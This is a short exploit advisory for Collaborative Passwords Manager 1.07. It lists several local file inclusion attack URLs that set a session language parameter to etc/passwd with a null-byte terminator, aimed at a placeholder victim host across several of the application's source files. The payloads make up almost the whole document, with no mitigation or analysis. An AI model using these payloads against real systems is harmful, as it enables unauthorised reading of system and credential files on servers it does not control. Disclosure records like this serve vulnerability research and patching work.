Collaborative Passwords Manager version 1.07 suffers from multiple local file inclusion vulnerabilities.
03e1459c1049afc08f07fa68390fb21a5fc3e7c449ede34018c84f159c4b7397
[~] Collaborative Passwords Manager 1.07 Multiple Local Include Exploit
[~] Found by sh00t0ut
[~] Expl:
[~] Vendor: https://code.google.com/p/cpassman/downloads/list
https://[victim]/?_SESSION[user_language]=[etc/passwd]%00
https://[victim]/sources/admin.queries.php?_SESSION[user_language]=[etc/passwd]%00
https://[victim]/sources/functions.queries.php?_SESSION[user_language]=[etc/passwd]%00
https://[victim]/sources/views.queries.php?_SESSION[user_language]=[etc/passwd]%00
https://[victim]/sources/groups.queries.php?_SESSION[user_language]=[etc/passwd]%00
https://[victim]/sources/items.queries.php?_SESSION[user_language]=[etc/passwd]%00